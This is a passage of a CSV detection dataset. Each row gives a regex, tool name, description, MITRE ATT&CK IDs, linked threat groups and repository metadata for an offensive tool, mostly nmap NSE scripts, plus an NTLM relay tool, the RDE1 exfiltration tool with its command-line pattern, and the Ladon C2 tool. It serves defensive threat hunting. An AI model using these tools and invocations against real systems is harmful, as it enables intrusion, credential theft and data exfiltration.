"* http-iis-webdav-vuln.nse*",".{0,1000}\shttp\-iis\-webdav\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1500"
"* http-internal-ip-disclosure.nse*",".{0,1000}\shttp\-internal\-ip\-disclosure\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1501"
"* http-joomla-brute.nse*",".{0,1000}\shttp\-joomla\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1502"
"* http-jsonp-detection.nse*",".{0,1000}\shttp\-jsonp\-detection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1503"
"* http-lexmark-version.nse*",".{0,1000}\shttp\-lexmark\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","N/A","7","627","59","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z","1504"
"* http-lfi.nse*",".{0,1000}\shttp\-lfi\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","1505"
"* http-litespeed-sourcecode-download.nse*",".{0,1000}\shttp\-litespeed\-sourcecode\-download\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1506"
"* http-log4shell.nse*",".{0,1000}\shttp\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","1507"
"* http-ls.nse*",".{0,1000}\shttp\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1508"
"* http-majordomo2-dir-traversal.nse*",".{0,1000}\shttp\-majordomo2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1509"
"* http-malware-host.nse*",".{0,1000}\shttp\-malware\-host\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1510"
"* http-mcmp.nse*",".{0,1000}\shttp\-mcmp\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1511"
"* http-methods.nse*",".{0,1000}\shttp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1512"
"* http-method-tamper.nse*",".{0,1000}\shttp\-method\-tamper\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1513"
"* http-mobileversion-checker.nse*",".{0,1000}\shttp\-mobileversion\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1514"
"* http-nikto-scan.nse*",".{0,1000}\shttp\-nikto\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","1515"
"* http-ntlm-info.nse*",".{0,1000}\shttp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1516"
"* http-open-proxy.nse*",".{0,1000}\shttp\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1517"
"* http-open-redirect.nse*",".{0,1000}\shttp\-open\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1518"
"* http-passwd.nse*",".{0,1000}\shttp\-passwd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1519"
"* http-phpmyadmin-dir-traversal.nse*",".{0,1000}\shttp\-phpmyadmin\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1520"
"* http-phpself-xss.nse*",".{0,1000}\shttp\-phpself\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1521"
"* http-php-version.nse*",".{0,1000}\shttp\-php\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1522"
"* http-proxy-brute.nse*",".{0,1000}\shttp\-proxy\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1523"
"* http-put.nse*",".{0,1000}\shttp\-put\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1524"
"* http-qnap-nas-info.nse*",".{0,1000}\shttp\-qnap\-nas\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1526"
"* http-referer-checker.nse*",".{0,1000}\shttp\-referer\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1527"
"* httprelayserver.py*",".{0,1000}\shttprelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","1528"
"* http-rfi-spider.nse*",".{0,1000}\shttp\-rfi\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1529"
"* http-robots.txt.nse*",".{0,1000}\shttp\-robots\.txt\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1530"
"* http-robtex-reverse-ip.nse*",".{0,1000}\shttp\-robtex\-reverse\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1531"
"* http-robtex-shared-ns.nse*",".{0,1000}\shttp\-robtex\-shared\-ns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1532"
"* https -i 0.0.0.0 -P * -k * --private-cert * --public-cert *",".{0,1000}\shttps\s\-i\s0\.0\.0\.0\s\-P\s.{0,1000}\s\-k\s.{0,1000}\s\-\-private\-cert\s.{0,1000}\s\-\-public\-cert\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","1533"
"* http-sap-netweaver-leak.nse*",".{0,1000}\shttp\-sap\-netweaver\-leak\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1534"
"* http-security-headers.nse*",".{0,1000}\shttp\-security\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1535"
"* http-server-header.nse*",".{0,1000}\shttp\-server\-header\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1536"
"* http-shellshock.nse*",".{0,1000}\shttp\-shellshock\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1537"
"* http-sitemap-generator.nse*",".{0,1000}\shttp\-sitemap\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1538"
"* http-slowloris.nse*",".{0,1000}\shttp\-slowloris\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1539"
"* http-slowloris-check.nse*",".{0,1000}\shttp\-slowloris\-check\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1540"
"* HTTPSniffer *",".{0,1000}\sHTTPSniffer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1541"
"* http-spider-log4shell.nse*",".{0,1000}\shttp\-spider\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","1542"
"* http-sql-injection.nse*",".{0,1000}\shttp\-sql\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1543"
"* https-redirect.nse*",".{0,1000}\shttps\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1544"
"* http-stored-xss.nse*",".{0,1000}\shttp\-stored\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1545"
